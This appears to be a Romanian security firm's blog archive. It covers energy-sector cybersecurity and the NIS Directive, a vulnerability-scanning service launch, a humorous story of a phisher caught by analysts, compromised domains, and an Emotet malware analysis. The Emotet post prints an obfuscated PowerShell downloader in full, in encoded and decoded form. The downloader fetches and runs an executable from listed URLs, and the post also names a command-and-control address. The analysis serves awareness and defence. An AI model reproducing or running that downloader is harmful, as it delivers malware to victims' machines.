Arhiva tag-ul pentru: servicii

Securitatea cibernetică – Energie și Gaze naturale

Securitatea cibernetică a devenit o problemă majoră pentru toate sectoarele economice, inclusiv industria energetică și a gazelor naturale. În contextul actual al creșterii numărului și al intensității atacurilor cibernetice, protejarea infrastructurii critice este o prioritate. În acest articol, vom discuta despre necesitatea securității cibernetice în industria energetică și a gazelor naturale și despre riscurile asociate cu atacurile cibernetice asupra acestora. De asemenea, vom prezenta beneficiile implementării unor măsuri minime de securitate cibernetică și cum Directiva NIS poate ajuta în acest sens.

Industria energetică și a gazelor naturale reprezintă o componentă vitală a infrastructurii critice a oricărei economii. Această industrie implică prelucrarea, stocarea și transportul resurselor energetice, inclusiv petrol, gaze naturale și cărbune, prin intermediul unor rețele și infrastructuri extinse. Atacurile cibernetice asupra acestor infrastructuri pot avea consecințe devastatoare, care pot afecta nu doar producția de energie, ci și economia și societatea în ansamblu.

Conform multiplelor rapoarte, numărul atacurilor cibernetice împotriva industriei energetice a crescut semnificativ în ultimii ani. În 2020, s-a înregistrat o creștere de 4% în numărul total de incidente de securitate cibernetică raportate în sectorul energiei și gazelor naturale, comparativ cu anul anterior.

De asemenea, aceste rapoarte arată că numărul de grupuri de hackeri care vizau infrastructura energetică a crescut de la 5 în 2016 la 9 în 2020, ceea ce indică o tendință îngrijorătoare.

De-a lungul anilor, atacurile cibernetice împotriva infrastructurii critice din industria energetică și a gazelor naturale au avut consecințe grave, cum ar fi întreruperea furnizării de energie și gaze, precum și pierderi financiare semnificative.

Riscurile asociate cu atacurile cibernetice asupra infrastructurii energetice și a gazelor naturale pot fi clasificate în mai multe categorii, inclusiv:

  1. Oprirea sau perturbarea producției de energie sau gaze naturale, ceea ce poate duce la întreruperi ale alimentării cu energie electrică sau la creșterea prețurilor pentru consumatori.
  2. Manipularea datelor și informațiilor critice ale infrastructurii, ceea ce poate duce la pierderi financiare semnificative sau la perturbarea întregii industrii.
  3. Accesul neautorizat la infrastructura critică, ceea ce poate duce la furtul de date și informații critice sau la distrugerea infrastructurii.
  4. Creșterea vulnerabilităților de securitate, ceea ce poate duce la riscuri mai mari de atacuri cibernetice ulterioare.

Pentru a preveni aceste riscuri, este important să implementăm măsuri de securitate cibernetică adecvate în industria energetică și a gazelor naturale. Aceste măsuri includ implementarea unor politici de securitate cibernetică, utilizarea unor soluții de securitate cibernetică avansate, formarea personalului în ceea ce privește securitatea cibernetică și monitorizarea continuă a infrastructurii.

Articolul 5 din Directiva Europeană privind securitatea rețelelor și a sistemelor informatice (Directiva NIS) face referire la sectoarele critice, inclusiv la sectorul energiei și gazelor naturale. Acest articol stipulează că:

„Statele membre asigură că operatorii de servicii esențiale și furnizorii de servicii digitale își stabilesc și își implementează măsuri de securitate adecvate și proporționale care să asigure o protecție ridicată și continuă a rețelelor și sistemelor lor informatice, astfel încât să fie prevenite și reduse la minimum consecințele incidentelor care afectează securitatea rețelelor și a sistemelor lor informatice.”

De asemenea, articolul 8 se referă la cooperarea între statele membre și sectorul privat pentru a identifica și aborda riscurile de securitate cibernetică care afectează infrastructura critică, inclusiv sectorul energiei și gazelor naturale. Acest articol specifică că:

„Statele membre încurajează cooperarea între statele membre și între autoritățile naționale competente și operatorii de servicii esențiale și furnizorii de servicii digitale, precum și alte părți interesate relevante, pentru a identifica și aborda riscurile și vulnerabilitățile semnificative care afectează securitatea rețelelor și a sistemelor informatice care susțin prestarea de servicii esențiale.”

Aceste prevederi din Directiva NIS evidențiază importanța protejării sectorului energetic și a gazelor naturale împotriva atacurilor cibernetice și necesitatea cooperării între statele membre și sectorul privat pentru a aborda această problemă.

Implementarea unor măsuri minime de securitate cibernetică poate aduce beneficii semnificative pentru industria energetică și a gazelor naturale:

  1. Reducerea riscului de pierderi financiare semnificative și de întreruperi ale alimentării cu energie.
  2. Protejarea informațiilor și datelor crit
  3. ice ale infrastructurii, asigurându-se astfel că acestea rămân confidențiale și nu sunt manipulate sau deteriorate de atacuri cibernetice.
  4. Creșterea încrederii consumatorilor și a altor părți interesate în industria energetică și a gazelor naturale.
  5. Respectarea cerințelor de conformitate cu reglementările și standardele de securitate cibernetică.
  6. Pentru a îmbunătăți securitatea cibernetică în industria energetică și a gazelor naturale, Directiva NIS (Directiva privind securitatea rețelelor și a sistemelor informatice) poate fi un instrument util. Directiva NIS a fost introdusă de Uniunea Europeană pentru a asigura o protecție mai bună împotriva atacurilor cibernetice și pentru a spori reziliența infrastructurii critice.
  7. Una dintre cerințele Directivelor NIS este ca operatorii de infrastructură critică, inclusiv operatorii din industria energetică și a gazelor naturale, să efectueze consultanță și audituri NIS autorizate de Autoritatea Națională de Securitate Cibernetică. Acest proces ajută la identificarea vulnerabilităților de securitate cibernetică și la implementarea măsurilor de securitate adecvate.

În concluzie, protejarea sectorului energetic și a gazelor naturale împotriva atacurilor cibernetice este de o importanță critică pentru stabilitatea și siguranța sistemelor de energie și gaze naturale. Este necesară alocarea de resurse financiare adecvate pentru implementarea unor măsuri de securitate cibernetică solide și eficiente, pentru a reduce riscul de atacuri cibernetice și a minimiza consecințele acestora. Este important să tratăm acest subiect cu responsabilitate și să colaborăm cu autoritățile naționale competente, operatorii de servicii esențiale și furnizorii de servicii digitale, precum și alte părți interesate relevante, pentru a identifica și aborda riscurile și vulnerabilitățile semnificative. Prin luarea în considerare a acestor aspecte și aplicarea măsurilor de securitate cibernetică adecvate, putem îmbunătăți securitatea și protecția sectorului energetic și a gazelor naturale și contribui la asigurarea stabilității și siguranței sistemelor noastre energetice.

Lansare publică a serviciului ctrlProdefence

ctrlProdefence – O platformă ce este gestionată de Prodefence, din anul 2019, pentru a veni în sprijinul clienților săi, exclusiv ca o completare a testelor de penetrare (audit de securitate).

Datorită situațiilor critice în care se află sistemele informaționale din Romania, dar și a evoluției atacurilor cibernetice, am hotărât să alocăm resursele necesare pentru extinderea acestei platforme, mărind capacitatea de stocare și transfer de date. Astfel am ajuns la stadiul în care putem susține un număr mare de clienți ce doresc să iși protejeze datele și reputația Instituției sau Firmei pe care o administrează.

Platforma vine în sprijinul tuturor administratorilor IT&C, responsabili pentru anumite active (pagini web, aplicații web, servere, rețele, magazine online), transformând un numar mare de informații, intr-un raport cu date esențiale despre vulnerabilitațile nou apărute, care le-ar putea afecta sistemele informaționale.

În imaginea de mai sus, se poate observa prezența vulnerabilităților (vulnerabilități noi adaugate în funcție de sistemele scanate) de la prima scanare a unor active (IP retea), până la ultima scanare din această lună. La introducera, lor în luna Martie 2020, vulnerabilitățile ce ar fi putut afecta rețelele erau în număr foarte mare, datorită faptului că unele sisteme nu aveau actualizări la zi și nici nu erau administrate corespunzător.
După trimiterea primului raport către Directorii instituțiilor/ firmelor și în urma discuțiilor explicative, aceștia au înțeles gravitatea situației și necesitatea alocării de buget pentru protejarea sistemelor informaționale.

Ce conține ctrlProdefence

  • Aplicații de top dezvoltate pentru descoperirea de vulnerabilități;
  • Automatizare pentru majoritatea funcțiilor incluse;
  • Posibilitatea de a programa frecvența scanărilor;
  • Calcularea și catalogarea riscurilor, în funcție de sistem și vulnerabilități;
  • Raportarea riscurilor critice la nivel de alertă;
  • Sistem de urmărire a evoluției vulnerabilităților;
  • Panou de control cu permisiuni la cerere (administrator, manager).

Variante de folosire a platformei.
Includerea în platformă se poate face după efectuarea unui audit de securitate (test de penetrare) asupra activelor, iar platforma să fie destinată monitorizării sistemelor informaționale. Un audit de securitate poate descoperi cele mai ascunse vulnerabilități, deoarece se aplică teste bazate pe intuiția și interpretarea auditorului.
Dar în aceiași măsură există și varianta de menținere a securității sistemelor prin eliminarea vulnerabilităților raportate de platformă, deoarece aplicațiile integrate sunt actualizate și folosesc metode inteligente de descoperire a vulnerabilităților.

Din experiență, știm că banii sunt un factor decisiv când vine vorba despre investiții!
Dar aceasta nu este o investiție! Securitatea cibernetică este un element esențial în protejarea infrastructurii Instituției sau a Firmei pe care o administrați!
Protejarea datelor confidențiale, protejarea integrității și a reputației este responsabilitatea conducerii, în primul rând!
În fiecare an trebuie alocat buget pentru menținerea sistemelor informaționale la un nivel cel puțin acceptabil, din punct de vedere al securității cibernetice!

Prețul pentru integrarea in platforma ctrlProdefence se stabilește în funcție de marimea Instituției/ Firmei, nivelul de confidențialitate a datelor stocate și numarul activelor (ip, retea, web).

În concluzie, vizitați pagina cu informațiile platformei și rămâne să discutăm detaliile care vă interesează, încât să vă putem personaliza o ofertă de preț!

„Salut, sunt Hacker si cred ca am calcat gresit!”

Eu sunt… să zicem H4ker!
Astăzi vom vorbi despre mine ca hacker activ pe internet, dar și despre ce am pățit de curând.
Fac mai multe prostii pe net, dar astăzi vă voi povesti despre faptul că de ceva timp trimit email-uri de tip phishing către instituții din Romania, Grecia și Bulgaria.
Motivul meu este clar. Vreau să obțin cât mai multe date personale de logare de la victimele mele!!
Nu mă poate prinde nimeni, pentru că folosesc VPN și IP-ul meu este ascuns!!!

Am găsit un browser stealer, adică o aplicație ce fură datele din browserele victimelor, gen Firefox, Chrome, Opera etc.
Nu am bani să il criptez, dar pică lumea chiar dacă Antivirusul anunță problema. Am un ftp furat tot de la victime și ma folosesc de el pentru colectarea datelor.
Metoda este simplă, cunoscută, dar merge foarte bine din cauza lipsei de educație cibernetică, mai ales la instituțiile publice unde sunt multe persoane… ce nu dau atenție la detalii..

Zilnic am câte 5-10 victime și sunt mulțumit de rezultate, așteptând să prind ceva bun!

Dar ideea este că nu am știut ce poate face un specialist in securitate cibernetică, sau cei care se ocupă in general de fișierele virusate!!

Eu am ascuns virusul intr-un fișier .iso pe care dacă il deschizi activează toată activitatea fără ca victima să înțeleagă ceva. Neștiind că cineva poate extrage acel virus și îl poate analiza.

După cum se vede și în imaginea de mai sus, analistul care s-a ocupat de virusul meu a reușit să gasească datele mele de logare către locația unde vin cele furate de la victime.
Nu știam că se poate așa ceva. Acolo se vede și virusul meu, în varianta finală care ajungea în calculatoarele victimelor.
Așadar analistul putea avea acces la datele furate de mine și cine știe la ce altceva, dar asta este partea ok.

La un moment dat am văzut că imi dispar furăciunile, dar apar niște fișiere noi…

Im waiting este pus de mine, așa la smecherie… că aștept victimele să îmi trimită datele lor!
Dar a venit și fișierul cu .iso, credeam că este o eroare a fișierului trimis de mine, deși nu avea cum să vină pe server, dar până la urmă l-am deschis ca să rezolv eroarea virusului.
Până la urmă mi-am dat seama că nu mergea deschis și l-am șters! Prostie de eroare…
La vreo 2 minute victime noi, deschid să văd ce am furat și… ce naiba?!? Datele mele pe unul din fișiere?!?
Atunci am înțeles că fișierul .iso era chiar virusul meu, pe care l-am deschis și mi-am furat datele.
Întârzierea de cîteva minute este logică, deoarece virusul meu actionează dupa 2 minute de la deschidere ;)


Atunci m-a lovit o idee destul de dureroasă! Cum de a venit virusul pe server și dacă analistul este și el pe server și mi-a luat datele???
Asta chiar ar fi de rău!!!

La ceva timp și dupa alte câteva victime, apar victime noi si incă un fișier .iso, clar că nu pun botul de două ori la aceiași capcană!!! Hellooo

Alea cu PW le știu.. client mai vechi.
Management_CERT sună interesant, dar tot ce era acolo cred că erau date false, că nu mergea nimic deși păreau conturi de servere(am înțeles mai târziu că era pus să mă țină logat pe ftp).
Cloud_user_admin…. ăsta e genul de victime asteptate. Cont de Root/Admin pe el, dacă merge m-am scos!

Foatre tare, nu?
Ei bine am intrat pe link și mă ducea pe o pagină neterminată… deci nimic interesant…
Totuși intru pe whiteclouddrive. com să văd ce este și … NUUUUUUUUUU!!!!!!!!
Domeniu folosit de analiști ca și capcană pentru acesări neautorizate…. adica… pfff
Tocmai am realizat că analistul are datele mele!!! Luate de 2 ori… cred că a doua capcană a fost pentru confirmare…
Oare… ?? Pffff
Ce se aude afară? E cineva la usă? …………

Articolul este doar o poveste și trebuie tratată corespunzător!
Cei ce se pricep la astfel de activități pot renunța la varianta ”CTRL I” ! :)

Atenție la detalii!!!

Domenii si servere din Romania folosite pentru activitati de criminalitate cibernetica – Securizarea paginilor web o necesitate.

Astăzi vom discuta despre un subiect ce devine tot mai intens: Dece să platesc pentru servicii de securitate cibernetică?

Ei bine, clienții sau potențialii clienți ai serviciilor de securitate cibernetică sunt de mai multe feluri: pricepuți, înțelegători, curioși, indiferenți, fără buget, cu buget, pricepuți, foste victime, prieteni ai unor victime etc.
Impactul unei breșe de securitate asupra acestora se diferențiază prin deciziile anterioare atacului: S-a facut ceva, orice… sau Nu s-a facut nimic!

Așa cum scrie si în titlul acestui articol, astazi vă vom prezenta câteva imagini despre servere/domenii din Romania, care sunt folosite pentru activități ilegale, prin intermediul cărora încercăm să atragem atenția asupra necesității implementării unor standarde de securitate cibernetică.


În principiu, majoritatea sunt folosite pentru gazduirea de pagini false (Paypal, DHL, LinkedIn, EMS, Banci, Emails, Eshops… etc), pentru gazduirea de fișiere virusate( acestea le vom prezenta într-un articol viitor), redirecționări către alte pagini … etc
Problema este că majoritatea deținătorilor de pagini web nu știu ce se petrece în spatele cortinei și de aceea este nevoie ca fiecare să conștientizeze impactul negativ asupra celorlalti utilizatori de internet, sau chiar rasupra lor!

Se poate observa că unele dintre paginile false au ca țintă utilizatori din China, ceea ce clarifică naționalitatea hackerilor, sau cel putin naționalitatea potențialelor victime.

Lista putea fi mai lungă, dar multe dintre domeniile gasite sunt deja remediate sau sunt în curs de remediere.

Trebuie să ne implicăm și să fim responsabili!

Pentru a încheia cu un răspuns la întrebarea de la începutul articolului trebuie ca toți să conștientizăm pericolul din spatele unui server/ domaniu compromis și faptul că involuntar am ajutat la furtul de date, furt de bani, furt de identitate etc.

Articolul conține informații publice!
Sursa: urlscan.io

Emotet – Virus bancar – Prezent pe domenii din Romania

Hai să începem cu informațiile de bază!

Emotet este un virus din categoria Trojan sau mai degrabă un downloader, care are nevoie de acceptul victimei pentru a își începe activitatea în noua gazdă.
Este cheia care deschide ușa pentru adevăratul virus, care are ca scop extragerea de date personale, pentru ca hackerul să poată utiliza contul sau cardul victimei în scopuri personale.

Dacă la începuturi era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe „gratuite”, acum trimiterea lui se face prin intermediul unor documente care sunt trimise prin email, îar aceste documente conțin o comandă de descărcare și o adresă web, iar virusul este descărcat de acolo și actionează în noua gazda(pc, mobilr etc).
Aceasta metodă este folosită pentru a păcăli atât protecția serviciilor de email, cât și viitoarea victimă.

La intrarea virusului cu acceptul victimei, șansele de scapare se bazează doar în posibilitatea de recunoaștere a virusului respectiv de catre antivirus, firewall… în funcție de ce are victima în dispozitiv.

Dar sa trecem la povestea noastră și o sa facem o mică analiză malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una dintre aceste liste conține două domenii de România.
Se presupune că sunt controlate de hackeri și folosite pentru a își gazdui fisierele lor malware.

Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.

Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.

La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante „curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8

Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n „C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc

Comanda folosita de Powershell este ascunsa si criptata:

Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==

Decryptata din Base64

$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� �{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�

Decryptata are mai multe informatii interesante:

$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’

Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…

Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?

Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!

Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).

Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.

In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.

Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!

In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.